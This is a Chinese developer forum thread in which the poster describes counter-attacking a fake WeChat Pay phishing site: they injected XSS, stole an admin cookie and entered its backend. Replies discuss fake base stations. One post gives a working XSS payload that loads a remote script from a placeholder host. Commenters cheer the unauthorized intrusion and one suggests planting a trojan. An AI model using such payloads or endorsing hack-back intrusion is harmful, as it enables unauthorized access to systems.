这是一个创建于 2899 天前的主题,其中的信息可能已经有所发展或是发生改变。
昨天在微信官网上申请微信支付,今天下午就收到了一条短信
于是我就点开了这个链接,发现是 asp 后缀的,腾讯应该搞 php 的啊,我于是就发现有点不对头,我就往里面来了一发 xss 代码。
不一会儿就搞到了 cookie, 登录后台一看。。
第 1 条附言 · 2016-12-21 09:38:42 +08:00
各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo )
移动的短信详单:
我的手机收到的短信:
(我的手机还"智能"的给短信加了 logo ) |
1
Showfom 2016-12-20 13:56:44 +08:00 via iPhone
只能说有些人太好骗了
|
 |
2
SourceMan 2016-12-20 13:57:22 +08:00
火钳刘明
这个是大新闻 |
 |
3
kimwang 2016-12-20 14:00:31 +08:00
"放蛇“(钓鱼执法) ……
|
 |
4
TangMonk OP  102
我现在已经把上面被盗的信息全部给他删完了。。
|
 |
5
icodesign 2016-12-20 14:01:17 +08:00
取款密码......
|
 |
6
HGladIator 2016-12-20 14:02:47 +08:00 via iPhone
第一眼就看到了域名错误。
|
|
7
TangMonk OP 查了下 whois ,貌似是在上海祥和路,电话: 0215822656 , qq: 395849573958
|
 |
8
HFX3389 2016-12-20 14:05:37 +08:00
我只说两个字,求教。
|
 |
10
sorcerer 2016-12-20 14:08:57 +08:00 via iPhone
😂他在哪个页面中了你的 xss
|
 |
11
mrjoel 2016-12-20 14:15:11 +08:00
所以说啊,还是老老实实用 PHP
|
 |
13
lyragosa 2016-12-20 14:16:38 +08:00
转型 php 最好语言贴……
|
 |
14
815lbh 2016-12-20 14:28:35 +08:00
大哥,受我一拜,好人啊。(。・∀・)ノ゙
|
 |
16
hlg002 2016-12-20 14:36:08 +08:00
求教程
|
 |
17
wenymedia 2016-12-20 14:40:54 +08:00 via Android
楼主干的漂亮
感觉把对方服务器肉鸡了 或者重定向到某榴… 更刺鸡 |
|
18
TangMonk OP @hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8
|
 |
19
hnnxn 2016-12-20 14:44:16 +08:00 via Android
楼主好人
|
 |
20
x86 2016-12-20 14:47:22 +08:00 1
php 我学还不行吗
|
 |
22
zhang1215 2016-12-20 14:51:00 +08:00
楼主 666 ,再低劣的骗术也有人中招
|
 |
23
phieo 2016-12-20 14:53:51 +08:00
顶楼主 现在社会需要你这样正直的人
|
 |
26
KenGe 2016-12-20 15:00:57 +08:00
你用了 wifi 没还是用的自己的网络?
|
 |
27
asdwddd 2016-12-20 15:01:55 +08:00
大家跟进看什么原因
|
 |
30
CerealKiller 2016-12-20 15:09:40 +08:00 via iPhone
看网址 应该能看出不对头……学习了
|
 |
31
Felldeadbird 2016-12-20 15:14:40 +08:00
哈哈,骗子反被楼主骗了。
骗子:哼哼哼,骗子! |
 |
32
jiangzhuo 2016-12-20 15:23:14 +08:00
95017 确实是腾讯的客服电话吧。城里套路真是深啊
|
 |
33
marsLeo 2016-12-20 15:33:08 +08:00
如果你在收到短信前,有短时间手机突然没信号,那有可能是伪基站发的短信。
|
 |
34
jacy 2016-12-20 16:05:41 +08:00
数据库挂了还是本来就会错误
|
 |
35
mgna17 2016-12-20 16:08:01 +08:00 via iPhone
Microsoft JET Database Engine 错误 '80004005'
未指定的错误 /include/db_conn.asp ,行 36 他的数据库被人玩坏了。。。 |
 |
37
subpo 2016-12-20 16:16:50 +08:00
问题是...95017 确实是微信的客服号码,这个怎么弄的?
|
 |
41
smallaccount 2016-12-20 17:21:24 +08:00
楼主做了一件大好事。
|
 |
42
WhyAreYouSoSad 2016-12-20 17:25:14 +08:00 3
马云:祝各位阿 sir 在警察部一帆风顺。干杯!
|
 |
43
hack 2016-12-20 17:49:05 +08:00 via Android
太暴力,后台登录挂个网马撸出来照片或者视频最好
|
 |
44
hahiru 2016-12-20 17:49:53 +08:00 via Android
伪基站的话应该是撒网捞鱼的。碰巧遇到楼主,腾讯背了锅。
|
 |
47
f1r1ng 2016-12-20 18:01:27 +08:00
是不是手机里软件有问题。。
|
 |
48
dreamwar 2016-12-20 18:08:38 +08:00
基站伪装
|
 |
49
mringg 2016-12-20 18:16:52 +08:00 via iPhone
这个重点不是内鬼麼
|
 |
50
dahvlh 2016-12-20 18:19:59 +08:00
= =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情
得到微信内部查查是谁卖的了 |
 |
51
basefas 2016-12-20 18:29:38 +08:00 via iPhone
没有人吐槽“登陆”的么(滑稽)
|
 |
53
nfroot 2016-12-20 18:39:51 +08:00
@basefas 这货跟我一样,登陆和登录拼音输入法打出哪个用哪个……而且后台没过滤 XSS (我也是填表的时候做过滤……) 看来后台做个防止载入其他站点资源的那个功能是完全有必要的,我以前也想到说如果别人 XSS 我后台……后台地址藏好了也随时暴露……
|
 |
55
ahkxhyl 2016-12-20 18:44:19 +08:00
我去 贴主~很屌 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~
|
 |
57
zhouyg 2016-12-20 18:53:48 +08:00
牛掰,果然 php 才是王道。
|
 |
59
Patrick95 2016-12-20 19:07:03 +08:00
应该是伪基站群发了短信,恰好赶上你微信支付了。
|
 |
60
TimePPT 2016-12-20 19:10:56 +08:00 via iPhone
围观
|
 |
62
NaturalColour 2016-12-20 19:31:29 +08:00
厉害了我的楼主
|
 |
63
Quaintjade 2016-12-20 19:51:29 +08:00 via Android
可以查一下详单来分辨是不是伪基站,注意短彩信和增值业务都要查,因为有些增值业务也能发短信。
|
 |
64
cwz326237076 2016-12-20 19:52:02 +08:00 via Android
wap.weixtqq.com 这不摆明说是假的么
|
|
65
ahkxhyl 2016-12-20 19:59:38 +08:00
层主说的对 感觉有点像伪基站发的~~
|
 |
66
j8sec 2016-12-20 20:27:26 +08:00 1
腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑
|
 |
68
terence4444 2016-12-20 20:34:10 +08:00 via iPhone
过两天去查详单 看看到底是不是伪基站
|
 |
69
wclebb 2016-12-20 20:37:36 +08:00 via iPhone
申请微信支付有可能不是腾讯,而是第三方审核所在的公司。
|
 |
70
Tink 2016-12-20 20:43:14 +08:00
强,无敌!
|
 |
71
shingoxray 2016-12-20 20:48:28 +08:00
Good job !事关广大人民群众安全,建议向当地公安报案,并向腾讯安全应急响应中心报告。
|
 |
72
RobertYang 2016-12-20 21:58:44 +08:00 via Android
哈哈哈 干的漂亮
|
 |
73
Aidea 2016-12-20 22:58:12 +08:00
厉害,自己还是要加强学习啊~
|
 |
74
gotonba 2016-12-20 23:53:53 +08:00
难怪现在可以通过对公账户打款来验证,看来第三方确实不安全,还得交 300 大洋=。=
|
 |
75
jedihy 2016-12-20 23:55:14 +08:00 via iPhone
能不能写写入侵流程
|
 |
76
jookr 2016-12-21 00:52:36 +08:00
[建议]
1 、用个插件自定义你的 UA (例如插入几个字符),大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ,这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变 2 、 session 保存登录的 ip ,每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。 求还有什么方法或者更简便的方法防止被 XSS |
 |
77
onionnews 2016-12-21 08:49:41 +08:00 via Android
如果是伪基站的话,怎么知道谁刚刚开通微信支付,刚好受害者周围部署了伪基站?
|
 |
78
lxrmido 2016-12-21 08:55:55 +08:00
说起伪基站,大学时有一阵子只要发查询剩余流量的短信(移动卡)就会收到电信上网卡的推销短信……
|
|
80
TangMonk OP 楼上的各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:
移动的短信详单: 我的手机收到的短信: (我的手机还"智能"的给短信加了 logo ) |
 |
82
sola97 2016-12-21 09:44:32 +08:00
有没有 xss 代码供学习一下
|
 |
83
tairan2006 2016-12-21 10:10:55 +08:00
楼主好样的,佩服
|
 |
84
hoythan 2016-12-21 10:17:16 +08:00
能不能提供一下你的 xss 代码学习一下.
|
 |
85
mazyi 2016-12-21 10:25:30 +08:00
厉害啊厉害,随手注入了一下~
|
|
86
TangMonk OP 1
|
 |
88
BakCshi 2016-12-21 10:32:25 +08:00
去知乎发个帖,搞个大新闻
|
 |
89
nevermlnd 2016-12-21 10:36:57 +08:00
如果是 iPhone 的截图 回更有说服力
|
 |
90
ljcarsenal 2016-12-21 11:17:29 +08:00
@TangMonk 你这个代码直接通过用户名输入框输入进去的? 服务端和网页限制一下输入长度是不是就没用了
|
|
91
TangMonk OP @ljcarsenal 不是,这只是一个 js 链接包含的内容而已,输入框里面填写
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';> |
 |
92
wavingclear 2016-12-21 12:15:57 +08:00 via iPad
应该是伪基站,想骗普通吃瓜群众,骗到程序员是因为他倒霉
|
 |
93
sutking 2016-12-21 12:21:36 +08:00 via iPhone
第一眼就发现域名有问题啊
|
|
94
sutking 2016-12-21 12:24:05 +08:00 via iPhone
你看这 whois ,绝对坑你没商量
 |
 |
95
yamen 2016-12-21 13:12:01 +08:00
我不懂,但我觉得你用的是安卓吧?
|
 |
96
fengjianxinghun 2016-12-21 13:15:28 +08:00
nice !干得不错
|
 |
97
choury 2016-12-21 13:22:45 +08:00
这个是针对个人的微信支付来诈骗的吧,任何人收到都可能受骗啊,基本有微信的都开了微信支付吧,只是你收到短信的时间比较巧吧
|
 |
98
zhangsimon 2016-12-21 13:37:33 +08:00
你的手机什么 rom !!! 太干扰人了
|
|
99
TangMonk OP @zhangsimon 一加 2 。。氢 os
|
 |
100
samtoto 2016-12-21 13:50:12 +08:00
next page>
|
Select Language